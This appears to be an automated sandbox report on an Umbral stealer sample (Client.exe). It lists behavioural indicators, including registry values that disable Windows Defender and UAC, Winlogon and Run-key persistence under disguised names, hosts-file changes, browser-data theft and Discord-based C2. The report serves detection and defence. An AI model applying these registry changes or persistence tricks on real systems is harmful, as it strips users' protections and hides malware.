Malware Analysis Report

2024-10-10 10:00

Sample ID 240615-rxx4asxgmj
Target Client.exe
SHA256 88cf131986bedc03a33d12ea5392ce09f521d40a056b8576a34ee613f36479e5
Tags
umbral evasion execution persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

88cf131986bedc03a33d12ea5392ce09f521d40a056b8576a34ee613f36479e5

Threat Level: Known bad

The file Client.exe was found to be: Known bad.

Malicious Activity Summary

umbral evasion execution persistence spyware stealer trojan

Detect Umbral payload

Modifies WinLogon for persistence

UAC bypass

Umbral

Contains code to disable Windows Defender

Modifies Windows Defender Real-time Protection settings

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Modifies AppInit DLL entries

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Windows security modification

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks whether UAC is enabled

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Checks SCSI registry key(s)

Views/modifies file attributes

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Detects videocard installed

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

System policy modification

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-15 14:34

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 14:34

Reported

2024-06-15 14:37

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\xdwdMicrosoft Azure DevOps.exe" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Umbral

stealer umbral

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe N/A

Modifies AppInit DLL entries

persistence

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wbem\WmiApSrv.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Local\\xdwdGreenshot.exe" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Windows\system32\wbem\WmiApSrv.exe N/A
N/A N/A C:\Windows\system32\wbem\WmiApSrv.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2516 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3172 wrote to memory of 4808 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3172 wrote to memory of 4808 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1064 wrote to memory of 3652 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1064 wrote to memory of 3652 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2516 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2516 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2668 wrote to memory of 4200 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2668 wrote to memory of 4200 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
